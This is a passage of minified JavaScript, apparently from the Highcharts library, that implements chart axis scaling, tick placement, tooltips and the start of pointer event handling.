E(I[this.coll],a))},defaultLabelFormatter:function(){var a=this.axis,b=this.value,c=a.categories,d=this.dateTimeLabelFormat,e=I.lang.numericSymbols,f=e&&e.length,g,h=a.options.labels.format,a=a.isLog?b:a.tickInterval;if(h)g=ua(h,this);else if(c)g=b;else if(d)g=Ka(d,b);else if(f&&1E3<=a)for(;f--&&g===v;)c=Math.pow(1E3,f+1),a>=c&&null!==e[f]&&(g=qa(b/c,-1)+e[f]);g===v&&(g=1E4<=R(b)?qa(b,0):qa(b,-1,v,""));return g},getSeriesExtremes:function(){var a=this,b=a.chart;a.hasVisibleSeries=!1;a.dataMin=a.dataMax=
null;a.buildStacks&&a.buildStacks();s(a.series,function(c){if(c.visible||!b.options.chart.ignoreHiddenSeries){var d;d=c.options.threshold;var e;a.hasVisibleSeries=!0;a.isLog&&0>=d&&(d=null);a.isXAxis?(d=c.xData,d.length&&(a.dataMin=J(r(a.dataMin,d[0]),va(d)),a.dataMax=x(r(a.dataMax,d[0]),la(d)))):(c.getExtremes(),e=c.dataMax,c=c.dataMin,u(c)&&u(e)&&(a.dataMin=J(r(a.dataMin,c),c),a.dataMax=x(r(a.dataMax,e),e)),u(d)&&(a.dataMin>=d?(a.dataMin=d,a.ignoreMinPadding=!0):a.dataMax<d&&(a.dataMax=d,a.ignoreMaxPadding=
!0)))}})},translate:function(a,b,c,d,e,f){var g=1,h=0,k=d?this.oldTransA:this.transA;d=d?this.oldMin:this.min;var l=this.minPixelPadding;e=(this.options.ordinal||this.isLog&&e)&&this.lin2val;k||(k=this.transA);c&&(g*=-1,h=this.len);this.reversed&&(g*=-1,h-=g*(this.sector||this.len));b?(a=a*g+h-l,a=a/k+d,e&&(a=this.lin2val(a))):(e&&(a=this.val2lin(a)),"between"===f&&(f=0.5),a=g*(a-d)*k+h+g*l+($(f)?k*f*this.pointRange:0));return a},toPixels:function(a,b){return this.translate(a,!1,!this.horiz,null,
!0)+(b?0:this.pos)},toValue:function(a,b){return this.translate(a-(b?0:this.pos),!0,!this.horiz,null,!0)},getPlotLinePath:function(a,b,c,d,e){var f=this.chart,g=this.left,h=this.top,k,l,m=c&&f.oldChartHeight||f.chartHeight,n=c&&f.oldChartWidth||f.chartWidth,q;k=this.transB;e=r(e,this.translate(a,null,null,c));a=c=z(e+k);k=l=z(m-e-k);if(isNaN(e))q=!0;else if(this.horiz){if(k=h,l=m-this.bottom,a<g||a>g+this.width)q=!0}else if(a=g,c=n-this.right,k<h||k>h+this.height)q=!0;return q&&!d?null:f.renderer.crispLine(["M",
a,k,"L",c,l],b||1)},getLinearTickPositions:function(a,b,c){var d,e=ia(F(b/a)*a),f=ia(ya(c/a)*a),g=[];if(b===c&&$(b))return[b];for(b=e;b<=f;){g.push(b);b=ia(b+a);if(b===d)break;d=b}return g},getMinorTickPositions:function(){var a=this.options,b=this.tickPositions,c=this.minorTickInterval,d=[],e;if(this.isLog)for(e=b.length,a=1;a<e;a++)d=d.concat(this.getLogTickPositions(c,b[a-1],b[a],!0));else if(this.isDatetimeAxis&&"auto"===a.minorTickInterval)d=d.concat(this.getTimeTicks(this.normalizeTimeTickInterval(c),
this.min,this.max,a.startOfWeek)),d[0]<this.min&&d.shift();else for(b=this.min+(b[0]-this.min)%c;b<=this.max;b+=c)d.push(b);return d},adjustForMinRange:function(){var a=this.options,b=this.min,c=this.max,d,e=this.dataMax-this.dataMin>=this.minRange,f,g,h,k,l;this.isXAxis&&this.minRange===v&&!this.isLog&&(u(a.min)||u(a.max)?this.minRange=null:(s(this.series,function(a){k=a.xData;for(g=l=a.xIncrement?1:k.length-1;0<g;g--)if(h=k[g]-k[g-1],f===v||h<f)f=h}),this.minRange=J(5*f,this.dataMax-this.dataMin)));
if(c-b<this.minRange){var m=this.minRange;d=(m-c+b)/2;d=[b-d,r(a.min,b-d)];e&&(d[2]=this.dataMin);b=la(d);c=[b+m,r(a.max,b+m)];e&&(c[2]=this.dataMax);c=va(c);c-b<m&&(d[0]=c-m,d[1]=r(a.min,c-m),b=la(d))}this.min=b;this.max=c},setAxisTranslation:function(a){var b=this,c=b.max-b.min,d=b.axisPointRange||0,e,f=0,g=0,h=b.linkedParent,k=!!b.categories,l=b.transA;if(b.isXAxis||k||d)h?(f=h.minPointOffset,g=h.pointRangePadding):s(b.series,function(a){var h=k?1:b.isXAxis?a.pointRange:b.axisPointRange||0,l=a.options.pointPlacement,
p=a.closestPointRange;h>c&&(h=0);d=x(d,h);f=x(f,U(l)?0:h/2);g=x(g,"on"===l?0:h);!a.noSharedTooltip&&u(p)&&(e=u(e)?J(e,p):p)}),h=b.ordinalSlope&&e?b.ordinalSlope/e:1,b.minPointOffset=f*=h,b.pointRangePadding=g*=h,b.pointRange=J(d,c),b.closestPointRange=e;a&&(b.oldTransA=l);b.translationSlope=b.transA=l=b.len/(c+g||1);b.transB=b.horiz?b.left:b.bottom;b.minPixelPadding=l*f},setTickPositions:function(a){var b=this,c=b.chart,d=b.options,e=b.isLog,f=b.isDatetimeAxis,g=b.isXAxis,h=b.isLinked,k=b.options.tickPositioner,
l=d.maxPadding,m=d.minPadding,n=d.tickInterval,q=d.minTickInterval,p=d.tickPixelInterval,w,v=b.categories;h?(b.linkedParent=c[b.coll][d.linkedTo],c=b.linkedParent.getExtremes(),b.min=r(c.min,c.dataMin),b.max=r(c.max,c.dataMax),d.type!==b.linkedParent.options.type&&fa(11,1)):(b.min=r(b.userMin,d.min,b.dataMin),b.max=r(b.userMax,d.max,b.dataMax));e&&(!a&&0>=J(b.min,r(b.dataMin,b.min))&&fa(10,1),b.min=ia(aa(b.min)),b.max=ia(aa(b.max)));b.range&&u(b.max)&&(b.userMin=b.min=x(b.min,b.max-b.range),b.userMax=
b.max,b.range=null);b.beforePadding&&b.beforePadding();b.adjustForMinRange();!(v||b.axisPointRange||b.usePercentage||h)&&u(b.min)&&u(b.max)&&(c=b.max-b.min)&&(u(d.min)||u(b.userMin)||!m||!(0>b.dataMin)&&b.ignoreMinPadding||(b.min-=c*m),u(d.max)||u(b.userMax)||!l||!(0<b.dataMax)&&b.ignoreMaxPadding||(b.max+=c*l));$(d.floor)&&(b.min=x(b.min,d.floor));$(d.ceiling)&&(b.max=J(b.max,d.ceiling));b.min===b.max||void 0===b.min||void 0===b.max?b.tickInterval=1:h&&!n&&p===b.linkedParent.options.tickPixelInterval?
b.tickInterval=b.linkedParent.tickInterval:(b.tickInterval=r(n,v?1:(b.max-b.min)*p/x(b.len,p)),!u(n)&&b.len<p&&!this.isRadial&&!this.isLog&&!v&&d.startOnTick&&d.endOnTick&&(w=!0,b.tickInterval/=4));g&&!a&&s(b.series,function(a){a.processData(b.min!==b.oldMin||b.max!==b.oldMax)});b.setAxisTranslation(!0);b.beforeSetTickPositions&&b.beforeSetTickPositions();b.postProcessTickInterval&&(b.tickInterval=b.postProcessTickInterval(b.tickInterval));b.pointRange&&(b.tickInterval=x(b.pointRange,b.tickInterval));
!n&&b.tickInterval<q&&(b.tickInterval=q);f||e||n||(b.tickInterval=eb(b.tickInterval,null,db(b.tickInterval),d));b.minorTickInterval="auto"===d.minorTickInterval&&b.tickInterval?b.tickInterval/5:d.minorTickInterval;b.tickPositions=a=d.tickPositions?[].concat(d.tickPositions):k&&k.apply(b,[b.min,b.max]);a||(!b.ordinalPositions&&(b.max-b.min)/b.tickInterval>x(2*b.len,200)&&fa(19,!0),a=f?b.getTimeTicks(b.normalizeTimeTickInterval(b.tickInterval,d.units),b.min,b.max,d.startOfWeek,b.ordinalPositions,b.closestPointRange,
!0):e?b.getLogTickPositions(b.tickInterval,b.min,b.max):b.getLinearTickPositions(b.tickInterval,b.min,b.max),w&&a.splice(1,a.length-2),b.tickPositions=a);h||(e=a[0],f=a[a.length-1],h=b.minPointOffset||0,d.startOnTick?b.min=e:b.min-h>e&&a.shift(),d.endOnTick?b.max=f:b.max+h<f&&a.pop(),1===a.length&&(d=1E13<R(b.max)?1:0.001,b.min-=d,b.max+=d))},setMaxTicks:function(){var a=this.chart,b=a.maxTicks||{},c=this.tickPositions,d=this._maxTicksKey=[this.coll,this.pos,this.len].join("-");!this.isLinked&&!this.isDatetimeAxis&&
c&&c.length>(b[d]||0)&&!1!==this.options.alignTicks&&(b[d]=c.length);a.maxTicks=b},adjustTickAmount:function(){var a=this._maxTicksKey,b=this.tickPositions,c=this.chart.maxTicks;if(c&&c[a]&&!this.isDatetimeAxis&&!this.categories&&!this.isLinked&&!1!==this.options.alignTicks&&this.min!==v){var d=this.tickAmount,e=b.length;this.tickAmount=a=c[a];if(e<a){for(;b.length<a;)b.push(ia(b[b.length-1]+this.tickInterval));this.transA*=(e-1)/(a-1);this.max=b[b.length-1]}u(d)&&a!==d&&(this.isDirty=!0)}},setScale:function(){var a=
this.stacks,b,c,d,e;this.oldMin=this.min;this.oldMax=this.max;this.oldAxisLength=this.len;this.setAxisSize();e=this.len!==this.oldAxisLength;s(this.series,function(a){if(a.isDirtyData||a.isDirty||a.xAxis.isDirty)d=!0});if(e||d||this.isLinked||this.forceRedraw||this.userMin!==this.oldUserMin||this.userMax!==this.oldUserMax){if(!this.isXAxis)for(b in a)for(c in a[b])a[b][c].total=null,a[b][c].cum=0;this.forceRedraw=!1;this.getSeriesExtremes();this.setTickPositions();this.oldUserMin=this.userMin;this.oldUserMax=
this.userMax;this.isDirty||(this.isDirty=e||this.min!==this.oldMin||this.max!==this.oldMax)}else if(!this.isXAxis)for(b in this.oldStacks&&(a=this.stacks=this.oldStacks),a)for(c in a[b])a[b][c].cum=a[b][c].total;this.setMaxTicks()},setExtremes:function(a,b,c,d,e){var f=this,g=f.chart;c=r(c,!0);e=t(e,{min:a,max:b});C(f,"setExtremes",e,function(){f.userMin=a;f.userMax=b;f.eventArgs=e;f.isDirtyExtremes=!0;c&&g.redraw(d)})},zoom:function(a,b){var c=this.dataMin,d=this.dataMax,e=this.options;this.allowZoomOutside||
(u(c)&&a<=J(c,r(e.min,c))&&(a=v),u(d)&&b>=x(d,r(e.max,d))&&(b=v));this.displayBtn=a!==v||b!==v;this.setExtremes(a,b,!1,v,{trigger:"zoom"});return!0},setAxisSize:function(){var a=this.chart,b=this.options,c=b.offsetLeft||0,d=this.horiz,e=r(b.width,a.plotWidth-c+(b.offsetRight||0)),f=r(b.height,a.plotHeight),g=r(b.top,a.plotTop),b=r(b.left,a.plotLeft+c),c=/%$/;c.test(f)&&(f=parseInt(f,10)/100*a.plotHeight);c.test(g)&&(g=parseInt(g,10)/100*a.plotHeight+a.plotTop);this.left=b;this.top=g;this.width=e;
this.height=f;this.bottom=a.chartHeight-f-g;this.right=a.chartWidth-e-b;this.len=x(d?e:f,0);this.pos=d?b:g},getExtremes:function(){var a=this.isLog;return{min:a?ia(L(this.min)):this.min,max:a?ia(L(this.max)):this.max,dataMin:this.dataMin,dataMax:this.dataMax,userMin:this.userMin,userMax:this.userMax}},getThreshold:function(a){var b=this.isLog,c=b?L(this.min):this.min,b=b?L(this.max):this.max;c>a||null===a?a=c:b<a&&(a=b);return this.translate(a,0,1,0,1)},autoLabelAlign:function(a){a=(r(a,0)-90*this.side+
720)%360;return 15<a&&165>a?"right":195<a&&345>a?"left":"center"},getOffset:function(){var a=this,b=a.chart,c=b.renderer,d=a.options,e=a.tickPositions,f=a.ticks,g=a.horiz,h=a.side,k=b.inverted?[1,0,3,2][h]:h,l,m=0,n,q=0,p=d.title,w=d.labels,t=0,P=b.axisOffset,na=b.clipOffset,K=[-1,1,1,-1][h],z,y=1,B=r(w.maxStaggerLines,5),E,H,A,D,Ia=2===h?c.fontMetrics(w.style.fontSize).b:0;a.hasData=l=a.hasVisibleSeries||u(a.min)&&u(a.max)&&!!e;a.showAxis=b=l||r(d.showEmpty,!0);a.staggerLines=a.horiz&&w.staggerLines;
a.axisGroup||(a.gridGroup=c.g("grid").attr({zIndex:d.gridZIndex||1}).add(),a.axisGroup=c.g("axis").attr({zIndex:d.zIndex||2}).add(),a.labelGroup=c.g("axis-labels").attr({zIndex:w.zIndex||7}).addClass("highcharts-"+a.coll.toLowerCase()+"-labels").add());if(l||a.isLinked){a.labelAlign=r(w.align||a.autoLabelAlign(w.rotation));s(e,function(b){f[b]?f[b].addLabel():f[b]=new xa(a,b)});if(a.horiz&&!a.staggerLines&&B&&!w.rotation){for(z=a.reversed?[].concat(e).reverse():e;y<B;){l=[];E=!1;for(w=0;w<z.length;w++)H=
z[w],A=(A=f[H].label&&f[H].label.getBBox())?A.width:0,D=w%y,A&&(H=a.translate(H),l[D]!==v&&H<l[D]&&(E=!0),l[D]=H+A);if(E)y++;else break}1<y&&(a.staggerLines=y)}s(e,function(b){if(0===h||2===h||{1:"left",3:"right"}[h]===a.labelAlign)t=x(f[b].getLabelSize(),t)});a.staggerLines&&(t*=a.staggerLines,a.labelOffset=t)}else for(z in f)f[z].destroy(),delete f[z];p&&p.text&&!1!==p.enabled&&(a.axisTitle||(a.axisTitle=c.text(p.text,0,0,p.useHTML).attr({zIndex:7,rotation:p.rotation||0,align:p.textAlign||{low:"left",
middle:"center",high:"right"}[p.align]}).addClass("highcharts-"+this.coll.toLowerCase()+"-title").css(p.style).add(a.axisGroup),a.axisTitle.isNew=!0),b&&(m=a.axisTitle.getBBox()[g?"height":"width"],q=r(p.margin,g?5:10),n=p.offset),a.axisTitle[b?"show":"hide"]());a.offset=K*r(d.offset,P[h]);a.axisTitleMargin=r(n,t+q+(t&&K*d.labels[g?"y":"x"]-Ia));P[h]=x(P[h],a.axisTitleMargin+m+K*a.offset);na[k]=x(na[k],2*F(d.lineWidth/2))},getLinePath:function(a){var b=this.chart,c=this.opposite,d=this.offset,e=this.horiz,
f=this.left+(c?this.width:0)+d,d=b.chartHeight-this.bottom-(c?this.height:0)+d;c&&(a*=-1);return b.renderer.crispLine(["M",e?this.left:f,e?d:this.top,"L",e?b.chartWidth-this.right:f,e?d:b.chartHeight-this.bottom],a)},getTitlePosition:function(){var a=this.horiz,b=this.left,c=this.top,d=this.len,e=this.options.title,f=a?b:c,g=this.opposite,h=this.offset,k=A(e.style.fontSize||12),d={low:f+(a?0:d),middle:f+d/2,high:f+(a?d:0)}[e.align],b=(a?c+this.height:b)+(a?1:-1)*(g?-1:1)*this.axisTitleMargin+(2===
this.side?k:0);return{x:a?d:b+(g?this.width:0)+h+(e.x||0),y:a?b-(g?this.height:0)+h:d+(e.y||0)}},render:function(){var a=this,b=a.horiz,c=a.reversed,d=a.chart,e=d.renderer,f=a.options,g=a.isLog,h=a.isLinked,k=a.tickPositions,l,m=a.axisTitle,n=a.ticks,q=a.minorTicks,p=a.alternateBands,w=f.stackLabels,r=f.alternateGridColor,t=a.tickmarkOffset,x=f.lineWidth,K=d.hasRendered&&u(a.oldMin)&&!isNaN(a.oldMin),z=a.hasData,y=a.showAxis,B,E=f.labels.overflow,A=a.justifyLabels=b&&!1!==E,C;a.labelEdge.length=0;
a.justifyToPlot="justify"===E;s([n,q,p],function(a){for(var b in a)a[b].isActive=!1});if(z||h)a.minorTickInterval&&!a.categories&&s(a.getMinorTickPositions(),function(b){q[b]||(q[b]=new xa(a,b,"minor"));K&&q[b].isNew&&q[b].render(null,!0);q[b].render(null,!1,1)}),k.length&&(l=k.slice(),(b&&c||!b&&!c)&&l.reverse(),A&&(l=l.slice(1).concat([l[0]])),s(l,function(b,c){A&&(c=c===l.length-1?0:c+1);if(!h||b>=a.min&&b<=a.max)n[b]||(n[b]=new xa(a,b)),K&&n[b].isNew&&n[b].render(c,!0,0.1),n[b].render(c,!1,1)}),
t&&0===a.min&&(n[-1]||(n[-1]=new xa(a,-1,null,!0)),n[-1].render(-1))),r&&s(k,function(b,c){0===c%2&&b<a.max&&(p[b]||(p[b]=new S.PlotLineOrBand(a)),B=b+t,C=k[c+1]!==v?k[c+1]+t:a.max,p[b].options={from:g?L(B):B,to:g?L(C):C,color:r},p[b].render(),p[b].isActive=!0)}),a._addedPlotLB||(s((f.plotLines||[]).concat(f.plotBands||[]),function(b){a.addPlotBandOrLine(b)}),a._addedPlotLB=!0);s([n,q,p],function(a){var b,c,e=[],f=ea?ea.duration||500:0,g=function(){for(c=e.length;c--;)a[e[c]]&&!a[e[c]].isActive&&
(a[e[c]].destroy(),delete a[e[c]])};for(b in a)a[b].isActive||(a[b].render(b,!1,0),a[b].isActive=!1,e.push(b));a!==p&&d.hasRendered&&f?f&&setTimeout(g,f):g()});x&&(b=a.getLinePath(x),a.axisLine?a.axisLine.animate({d:b}):a.axisLine=e.path(b).attr({stroke:f.lineColor,"stroke-width":x,zIndex:7}).add(a.axisGroup),a.axisLine[y?"show":"hide"]());m&&y&&(m[m.isNew?"attr":"animate"](a.getTitlePosition()),m.isNew=!1);w&&w.enabled&&a.renderStackTotals();a.isDirty=!1},redraw:function(){var a=this.chart.pointer;
a&&a.reset(!0);this.render();s(this.plotLinesAndBands,function(a){a.render()});s(this.series,function(a){a.isDirty=!0})},destroy:function(a){var b=this,c=b.stacks,d,e=b.plotLinesAndBands;a||T(b);for(d in c)Da(c[d]),c[d]=null;s([b.ticks,b.minorTicks,b.alternateBands],function(a){Da(a)});for(a=e.length;a--;)e[a].destroy();s("stackTotalGroup axisLine axisTitle axisGroup cross gridGroup labelGroup".split(" "),function(a){b[a]&&(b[a]=b[a].destroy())});this.cross&&this.cross.destroy()},drawCrosshair:function(a,
b){if(this.crosshair)if(!1===(u(b)||!r(this.crosshair.snap,!0)))this.hideCrosshair();else{var c,d=this.crosshair,e=d.animation;r(d.snap,!0)?u(b)&&(c=this.chart.inverted!=this.horiz?b.plotX:this.len-b.plotY):c=this.horiz?a.chartX-this.pos:this.len-a.chartY+this.pos;c=this.isRadial?this.getPlotLinePath(this.isXAxis?b.x:r(b.stackY,b.y)):this.getPlotLinePath(null,null,null,null,c);if(null===c)this.hideCrosshair();else if(this.cross)this.cross.attr({visibility:"visible"})[e?"animate":"attr"]({d:c},e);
else e={"stroke-width":d.width||1,stroke:d.color||"#C0C0C0",zIndex:d.zIndex||2},d.dashStyle&&(e.dashstyle=d.dashStyle),this.cross=this.chart.renderer.path(c).attr(e).add()}},hideCrosshair:function(){this.cross&&this.cross.hide()}};t(sa.prototype,{getPlotBandPath:function(a,b){var c=this.getPlotLinePath(b),d=this.getPlotLinePath(a);d&&c?d.push(c[4],c[5],c[1],c[2]):d=null;return d},addPlotBand:function(a){this.addPlotBandOrLine(a,"plotBands")},addPlotLine:function(a){this.addPlotBandOrLine(a,"plotLines")},
addPlotBandOrLine:function(a,b){var c=(new S.PlotLineOrBand(this,a)).render(),d=this.userOptions;c&&(b&&(d[b]=d[b]||[],d[b].push(a)),this.plotLinesAndBands.push(c));return c},removePlotBandOrLine:function(a){for(var b=this.plotLinesAndBands,c=this.options,d=this.userOptions,e=b.length;e--;)b[e].id===a&&b[e].destroy();s([c.plotLines||[],d.plotLines||[],c.plotBands||[],d.plotBands||[]],function(b){for(e=b.length;e--;)b[e].id===a&&oa(b,b[e])})}});sa.prototype.getTimeTicks=function(a,b,c,d){var e=[],
f={},g=I.global.useUTC,h,k=new Date(b-wa),l=a.unitRange,m=a.count;if(u(b)){l>=B.second&&(k.setMilliseconds(0),k.setSeconds(l>=B.minute?0:m*F(k.getSeconds()/m)));if(l>=B.minute)k[vb](l>=B.hour?0:m*F(k[gb]()/m));if(l>=B.hour)k[wb](l>=B.day?0:m*F(k[hb]()/m));if(l>=B.day)k[jb](l>=B.month?1:m*F(k[Ea]()/m));l>=B.month&&(k[xb](l>=B.year?0:m*F(k[Oa]()/m)),h=k[Pa]());if(l>=B.year)k[yb](h-h%m);if(l===B.week)k[jb](k[Ea]()-k[ib]()+r(d,1));b=1;wa&&(k=new Date(k.getTime()+wa));h=k[Pa]();d=k.getTime();for(var n=
k[Oa](),q=k[Ea](),p=g?wa:(864E5+6E4*k.getTimezoneOffset())%864E5;d<c;)e.push(d),d=l===B.year?Na(h+b*m,0):l===B.month?Na(h,n+b*m):g||l!==B.day&&l!==B.week?d+l*m:Na(h,n,q+b*m*(l===B.day?1:7)),b++;e.push(d);s(mb(e,function(a){return l<=B.hour&&a%B.day===p}),function(a){f[a]="day"})}e.info=t(a,{higherRanks:f,totalRange:l*m});return e};sa.prototype.normalizeTimeTickInterval=function(a,b){var c=b||[["millisecond",[1,2,5,10,20,25,50,100,200,500]],["second",[1,2,5,10,15,30]],["minute",[1,2,5,10,15,30]],["hour",
[1,2,3,4,6,8,12]],["day",[1,2]],["week",[1,2]],["month",[1,2,3,4,6]],["year",null]],d=c[c.length-1],e=B[d[0]],f=d[1],g;for(g=0;g<c.length&&!(d=c[g],e=B[d[0]],f=d[1],c[g+1]&&a<=(e*f[f.length-1]+B[c[g+1][0]])/2);g++);e===B.year&&a<5*e&&(f=[1,2,5]);c=eb(a/e,f,"year"===d[0]?x(db(a/e),1):1);return{unitRange:e,count:c,unitName:d[0]}};sa.prototype.getLogTickPositions=function(a,b,c,d){var e=this.options,f=this.len,g=[];d||(this._minorAutoInterval=null);if(0.5<=a)a=z(a),g=this.getLinearTickPositions(a,b,
c);else if(0.08<=a)for(var f=F(b),h,k,l,m,n,e=0.3<a?[1,2,4]:0.15<a?[1,2,4,6,8]:[1,2,3,4,5,6,7,8,9];f<c+1&&!n;f++)for(k=e.length,h=0;h<k&&!n;h++)l=aa(L(f)*e[h]),l>b&&(!d||m<=c)&&g.push(m),m>c&&(n=!0),m=l;else b=L(b),c=L(c),a=e[d?"minorTickInterval":"tickInterval"],a=r("auto"===a?null:a,this._minorAutoInterval,e.tickPixelInterval/(d?5:1)*(c-b)/((d?f/this.tickPositions.length:f)||1)),a=eb(a,null,db(a)),g=Xa(this.getLinearTickPositions(a,b,c),aa),d||(this._minorAutoInterval=a/5);d||(this.tickInterval=
a);return g};var Hb=S.Tooltip=function(){this.init.apply(this,arguments)};Hb.prototype={init:function(a,b){var c=b.borderWidth,d=b.style,e=A(d.padding);this.chart=a;this.options=b;this.crosshairs=[];this.now={x:0,y:0};this.isHidden=!0;this.label=a.renderer.label("",0,0,b.shape||"callout",null,null,b.useHTML,null,"tooltip").attr({padding:e,fill:b.backgroundColor,"stroke-width":c,r:b.borderRadius,zIndex:8}).css(d).css({padding:0}).add().attr({y:-9999});da||this.label.shadow(b.shadow);this.shared=b.shared},
destroy:function(){this.label&&(this.label=this.label.destroy());clearTimeout(this.hideTimer);clearTimeout(this.tooltipTimeout)},move:function(a,b,c,d){var e=this,f=e.now,g=!1!==e.options.animation&&!e.isHidden,h=e.followPointer||1<e.len;t(f,{x:g?(2*f.x+a)/3:a,y:g?(f.y+b)/2:b,anchorX:h?v:g?(2*f.anchorX+c)/3:c,anchorY:h?v:g?(f.anchorY+d)/2:d});e.label.attr(f);g&&(1<R(a-f.x)||1<R(b-f.y))&&(clearTimeout(this.tooltipTimeout),this.tooltipTimeout=setTimeout(function(){e&&e.move(a,b,c,d)},32))},hide:function(){var a=
this,b;clearTimeout(this.hideTimer);this.isHidden||(b=this.chart.hoverPoints,this.hideTimer=setTimeout(function(){a.label.fadeOut();a.isHidden=!0},r(this.options.hideDelay,500)),b&&s(b,function(a){a.setState()}),this.chart.hoverPoints=null)},getAnchor:function(a,b){var c,d=this.chart,e=d.inverted,f=d.plotTop,g=0,h=0,k;a=ha(a);c=a[0].tooltipPos;this.followPointer&&b&&(b.chartX===v&&(b=d.pointer.normalize(b)),c=[b.chartX-d.plotLeft,b.chartY-f]);c||(s(a,function(a){k=a.series.yAxis;g+=a.plotX;h+=(a.plotLow?
(a.plotLow+a.plotHigh)/2:a.plotY)+(!e&&k?k.top-f:0)}),g/=a.length,h/=a.length,c=[e?d.plotWidth-h:g,this.shared&&!e&&1<a.length&&b?b.chartY-f:e?d.plotHeight-g:h]);return Xa(c,z)},getPosition:function(a,b,c){var d=this.chart,e=this.distance,f={},g,h=["y",d.chartHeight,b,c.plotY+d.plotTop],k=["x",d.chartWidth,a,c.plotX+d.plotLeft],l=c.ttBelow||d.inverted&&!c.negative||!d.inverted&&c.negative,m=function(a,b,c,d){var g=c<d-e;b=d+e+c<b;c=d-e-c;d+=e;if(l&&b)f[a]=d;else if(!l&&g)f[a]=c;else if(g)f[a]=c;else if(b)f[a]=
d;else return!1},n=function(a,b,c,d){if(d<e||d>b-e)return!1;f[a]=d<c/2?1:d>b-c/2?b-c-2:d-c/2},q=function(a){var b=h;h=k;k=b;g=a},p=function(){!1!==m.apply(0,h)?!1!==n.apply(0,k)||g||(q(!0),p()):g?f.x=f.y=0:(q(!0),p())};(d.inverted||1<this.len)&&q();p();return f},defaultFormatter:function(a){var b=this.points||ha(this),c=b[0].series,d;d=[a.tooltipHeaderFormatter(b[0])];s(b,function(a){c=a.series;d.push(c.tooltipFormatter&&c.tooltipFormatter(a)||a.point.tooltipFormatter(c.tooltipOptions.pointFormat))});
d.push(a.options.footerFormat||"");return d.join("")},refresh:function(a,b){var c=this.chart,d=this.label,e=this.options,f,g,h={},k,l=[];k=e.formatter||this.defaultFormatter;var h=c.hoverPoints,m,n=this.shared;clearTimeout(this.hideTimer);this.followPointer=ha(a)[0].series.tooltipOptions.followPointer;g=this.getAnchor(a,b);f=g[0];g=g[1];!n||a.series&&a.series.noSharedTooltip?h=a.getLabelConfig():(c.hoverPoints=a,h&&s(h,function(a){a.setState()}),s(a,function(a){a.setState("hover");l.push(a.getLabelConfig())}),
h={x:a[0].category,y:a[0].y},h.points=l,this.len=l.length,a=a[0]);k=k.call(h,this);h=a.series;this.distance=r(h.tooltipOptions.distance,16);!1===k?this.hide():(this.isHidden&&(Ya(d),d.attr("opacity",1).show()),d.attr({text:k}),m=e.borderColor||a.color||h.color||"#606060",d.attr({stroke:m}),this.updatePosition({plotX:f,plotY:g,negative:a.negative,ttBelow:a.ttBelow}),this.isHidden=!1);C(c,"tooltipRefresh",{text:k,x:f+c.plotLeft,y:g+c.plotTop,borderColor:m})},updatePosition:function(a){var b=this.chart,
c=this.label,c=(this.options.positioner||this.getPosition).call(this,c.width,c.height,a);this.move(z(c.x),z(c.y),a.plotX+b.plotLeft,a.plotY+b.plotTop)},tooltipHeaderFormatter:function(a){var b=a.series,c=b.tooltipOptions,d=c.dateTimeLabelFormats,e=c.xDateFormat,f=b.xAxis,g=f&&"datetime"===f.options.type&&$(a.key),c=c.headerFormat,f=f&&f.closestPointRange,h;if(g&&!e){if(f)for(h in B){if(B[h]>=f||B[h]<=B.day&&0<a.key%B[h]){e=d[h];break}}else e=d.day;e=e||d.year}g&&e&&(c=c.replace("{point.key}","{point.key:"+
e+"}"));return ua(c,{point:a,series:b})}};var Ca;Ga=y.documentElement.ontouchstart!==v;var Ib=S.Pointer=function(a,b){this.init(a,b)};Ib.prototype={init:function(a,b){var c=b.chart,d=c.events,e=da?"":c.zoomType,c=a.inverted,f;this.options=b;this.chart=a;this.zoomX=f=/x/.test(e);this.zoomY=e=/y/.test(e);this.zoomHor=f&&!c||e&&c;this.zoomVert=e&&!c||f&&c;this.hasZoom=f||e;this.runChartClick=d&&!!d.click;this.pinchDown=[];this.lastValidTouch={};S.Tooltip&&b.tooltip.enabled&&(a.tooltip=new Hb(a,b.tooltip),
this.followTouchMove=b.tooltip.followTouchMove);this.setDOMEvents()},normalize:function(a,b){var c,d;a=a||window.event;a=Qb(a);a.target||(a.target=a.srcElement);d=a.touches?a.touches.length?a.touches.item(0):a.changedTouches[0]:a;b||(this.chartPosition=b=Pb(this.chart.container));d.pageX===v?(c=x(a.x,a.clientX-b.left),d=a.y):(c=d.pageX-b.left,d=d.pageY-b.top);return t(a,{chartX:z(c),chartY:z(d)})},getCoordinates:function(a){var b={xAxis:[],yAxis:[]};s(this.chart.axes,function(c){b[c.isXAxis?"xAxis":
"yAxis"].push({axis:c,value:c.toValue(a[c.horiz?"chartX":"chartY"])})});return b},getIndex:function(a){var b=this.chart;return b.inverted?b.plotHeight+b.plotTop-a.chartY:a.chartX-b.plotLeft},runPointActions:function(a){var b=this.chart,c=b.series,d=b.tooltip,e,f,g=b.hoverPoint,h=b.hoverSeries,k,l,m=b.chartWidth,n=this.getIndex(a);if(d&&this.options.tooltip.shared&&(!h||!h.noSharedTooltip)){f=[];k=c.length;for(l=0;l<k;l++)c[l].visible&&!1!==c[l].options.enableMouseTracking&&!c[l].noSharedTooltip&&
!0!==c[l].singularTooltips&&c[l].tooltipPoints.length&&(e=c[l].tooltipPoints[n])&&e.series&&(e._dist=R(n-e.clientX),m=J(m,e._dist),f.push(e));for(k=f.length;k--;)f[k]._dist>m&&f.splice(k,1);f.length&&f[0].clientX!==this.hoverX&&(d.refresh(f,a),this.hoverX=f[0].clientX)}c=h&&h.tooltipOptions.followPointer;if(h&&h.tracker&&!c){if((e=h.tooltipPoints[n])&&e!==g)e.onMouseOver(a)}else d&&c&&!d.isHidden&&(h=d.getAnchor([{}],a),d.updatePosition({plotX:h[0],plotY:h[1]}));d&&!this._onDocumentMouseMove&&(this._onDocumentMouseMove=
function(a){if(Y[Ca])Y[Ca].pointer.onDocumentMouseMove(a)},N(y,"mousemove",this._onDocumentMouseMove));s(b.axes,function(b){b.drawCrosshair(a,r(e,g))})},reset:function(a){var b=this.chart,c=b.hoverSeries,d=b.hoverPoint,e=b.tooltip,f=e&&e.shared?b.hoverPoints:d;(a=a&&e&&f)&&ha(f)[0].plotX===v&&(a=!1);if(a)e.refresh(f),d&&d.setState(d.state,!0);else{if(d)d.onMouseOut();if(c)c.onMouseOut();e&&e.hide();this._onDocumentMouseMove&&(T(y,"mousemove",this._onDocumentMouseMove),this._onDocumentMouseMove=null);
